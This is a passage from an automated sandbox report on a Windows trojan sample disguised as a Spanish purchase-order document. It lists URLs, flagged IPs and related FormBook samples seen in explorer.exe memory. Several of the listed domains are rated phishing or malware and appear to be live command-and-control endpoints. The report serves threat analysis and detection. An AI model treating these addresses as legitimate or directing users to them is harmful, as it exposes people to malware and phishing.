https://word.office.com	explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ytytyt016.xyz/pz08/www.aloyoga-uae.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.5819995.com/pz08/www.tacoshack479.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com	explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.phdop.xyz	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aloyoga-uae.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tobegoodlife.netReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kxn.ink/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tacoshack479.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kxn.ink	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.plantasdasminas.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000007.00000003.2272035015.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1404737205.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074160405.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3798409790.000000000913F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.go-bloggers.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tacoshack479.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.boostyourselftoday.com/pz08/www.yobo-by.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yassa-hany.online	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yobo-by.com/pz08/www.phdop.xyz	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.1404737205.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.pollensense.com/	explorer.exe, 00000007.00000002.3793412922.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.rdlva.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kxn.ink/pz08/www.nordens-media.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww25.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpB	explorer.exe, 00000007.00000002.3808854347.000000001092F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3789027018.000000000570F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.plantasdasminas.com/pz08/	explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000007.00000002.3796442982.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3794964784.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3796420580.0000000008810000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ytytyt016.xyz	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.sunriseclohting.store/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.5819995.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tacoshack479.com/pz08/www.sunriseclohting.store	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nordens-media.com/pz08/www.thewipglobal.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ytytyt016.xyz/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.tobegoodlife.net/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.yobo-by.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.go-bloggers.com/pz08/www.tobegoodlife.net	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sunriseclohting.store	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.boostyourselftoday.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yobo-by.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phdop.xyz/pz08/www.rdlva.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.tacoshack479.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.com	explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.5819995.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.foreca.com	explorer.exe, 00000007.00000002.3793412922.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.phdop.xyzReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.plantasdasminas.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nordens-media.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nordens-media.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nordens-media.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thewipglobal.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aloyoga-uae.com/pz08/www.kxn.ink	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.go-bloggers.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phdop.xyz/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.213	www.yassa-hany.online	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
15.197.130.221	www.thewipglobal.com	United States	7430	TANDEMUS	true
172.104.233.69	boostyourselftoday.com	United States	63949	LINODE-APLinodeLLCUS	true
15.197.142.173	nordens-media.com	United States	7430	TANDEMUS	true
18.167.179.176	51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
104.21.12.188	www.kxn.ink	United States	13335	CLOUDFLARENETUS	true
13.228.106.35	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
3.96.23.237	www.aloyoga-uae.com	United States	16509	AMAZON-02US	true
3.33.130.190	rdlva.com	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1400223
Start date and time:	2024-02-28 14:53:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Solicitud de pedido Documento No 168646080.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/6@10/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 245 Number of non-executed functions: 205
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Solicitud de pedido Documento No 168646080.exe

Simulations

Behavior and APIs

Time	Type	Description
14:54:34	API Interceptor	1x Sleep call for process: Solicitud de pedido Documento No 168646080.exe modified
14:54:39	API Interceptor	10x Sleep call for process: powershell.exe modified
14:54:46	API Interceptor	7399935x Sleep call for process: explorer.exe modified
15:59:00	API Interceptor	7350742x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.213	DHL Factura Electronica Pendiente documento No 04BB25083.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
